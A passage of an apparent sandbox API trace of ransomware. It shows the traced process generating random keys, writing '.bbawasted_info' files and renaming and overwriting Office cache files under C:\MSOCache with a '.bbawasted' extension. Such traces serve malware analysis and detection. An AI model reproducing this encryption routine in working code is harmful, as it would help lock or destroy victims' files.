dwNumberOfBytesToMap=0x7976) returned 0x570000 [0068.792] CloseHandle (hObject=0x114) returned 1 [0068.796] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5bad10) returned 1 [0068.797] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x1b8, pbBuffer=0x5db308 | out: pbBuffer=0x5db308) returned 1 [0068.797] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.797] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5bad10) returned 1 [0068.797] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.797] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.806] SetEndOfFile (hFile=0x110) returned 1 [0068.808] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db8d8 | out: hHeap=0x580000) returned 1 [0068.808] CloseHandle (hObject=0x110) returned 1 [0068.809] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.809] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf5b0 | out: hHeap=0x580000) returned 1 [0068.809] _aulldvrm () returned 0x0 [0068.809] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5bad10) returned 1 [0068.810] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.810] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.810] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0068.810] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5c77b0 [0068.810] lstrcpyW (in: lpString1=0x5c7852, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.810] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5db2c0 [0068.810] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5bad10) returned 1 [0068.811] CryptGenRandom (in: hProv=0x5bad10, dwLen=0xa3a, pbBuffer=0x5db2c0 | out: pbBuffer=0x5db2c0) returned 1 [0068.811] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.811] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.812] WriteFile (in: hFile=0x110, lpBuffer=0x5db2c0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5db2c0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.813] SetEndOfFile (hFile=0x110) returned 1 [0068.813] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.813] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db2c0 | out: hHeap=0x580000) returned 1 [0068.813] lstrcpyW (in: lpString1=0x5c7852, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted")) returned 1 [0068.829] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0068.829] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0068.830] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x10b2 [0068.830] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x570000 [0068.830] CloseHandle (hObject=0x120) returned 1 [0068.831] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.832] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0068.832] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.832] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.833] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.833] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.841] SetEndOfFile (hFile=0x110) returned 1 [0068.843] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.843] CloseHandle (hObject=0x110) returned 1 [0068.845] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.845] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0b50 | out: hHeap=0x580000) returned 1 [0068.845] _aulldvrm () returned 0x0 [0068.846] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.846] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.846] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.846] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0068.846] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5c77b0 [0068.847] lstrcpyW (in: lpString1=0x5c7850, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.847] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0068.847] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.847] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0068.847] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.847] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.850] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.851] SetEndOfFile (hFile=0x110) returned 1 [0068.851] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.851] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.851] lstrcpyW (in: lpString1=0x5c7850, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.bbawasted")) returned 1 [0068.853] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0068.853] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0068.853] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x1915 [0068.853] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1915) returned 0x570000 [0068.853] CloseHandle (hObject=0xfc) returned 1 [0068.856] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.856] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0068.856] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.857] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.857] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.857] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.866] SetEndOfFile (hFile=0x110) returned 1 [0068.868] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.868] CloseHandle (hObject=0x110) returned 1 [0068.869] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.869] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0c50 | out: hHeap=0x580000) returned 1 [0068.869] _aulldvrm () returned 0x0 [0068.870] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.870] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.870] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.870] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0068.870] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5c77b0 [0068.870] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.870] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0068.870] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.871] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0068.871] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.871] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.872] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.873] SetEndOfFile (hFile=0x110) returned 1 [0068.873] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.873] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.873] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0068.874] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0068.874] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0068.874] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x412b [0068.874] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x412b) returned 0x570000 [0068.875] CloseHandle (hObject=0x120) returned 1 [0068.912] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.913] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ba8a8 | out: pbBuffer=0x5ba8a8) returned 1 [0068.913] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.913] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.913] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.913] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.922] SetEndOfFile (hFile=0x110) returned 1 [0068.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4948 | out: hHeap=0x580000) returned 1 [0068.924] CloseHandle (hObject=0x110) returned 1 [0068.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf1f0 | out: hHeap=0x580000) returned 1 [0068.925] _aulldvrm () returned 0x0 [0068.925] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.926] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.926] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.926] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0068.926] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5c77b0 [0068.926] lstrcpyW (in: lpString1=0x5c7852, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.926] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0068.926] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.927] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0068.927] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.927] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.928] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.929] SetEndOfFile (hFile=0x110) returned 1 [0068.930] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.930] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.930] lstrcpyW (in: lpString1=0x5c7852, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted")) returned 1 [0068.930] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0068.930] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0068.931] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x10b2 [0068.931] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x570000 [0068.931] CloseHandle (hObject=0xfc) returned 1 [0068.932] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.933] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0068.933] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.933] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.934] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.934] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.942] SetEndOfFile (hFile=0x110) returned 1 [0068.944] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.944] CloseHandle (hObject=0x110) returned 1 [0068.946] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.946] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0850 | out: hHeap=0x580000) returned 1 [0068.946] _aulldvrm () returned 0x0 [0068.946] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.947] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.947] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.947] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0068.947] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c0) returned 0x5c77b0 [0068.947] lstrcpyW (in: lpString1=0x5c7866, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.947] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0068.947] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.948] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0068.948] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.948] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.948] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.949] SetEndOfFile (hFile=0x110) returned 1 [0068.951] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.952] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.952] lstrcpyW (in: lpString1=0x5c7866, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted")) returned 1 [0069.048] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.049] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0069.049] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0xaec3a [0069.049] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x11a0000 [0069.049] CloseHandle (hObject=0xf8) returned 1 [0069.077] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5c8560) returned 1 [0069.078] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0069.078] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.078] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5c8560) returned 1 [0069.079] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.079] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.087] SetEndOfFile (hFile=0x110) returned 1 [0069.089] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.089] CloseHandle (hObject=0x110) returned 1 [0069.091] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: 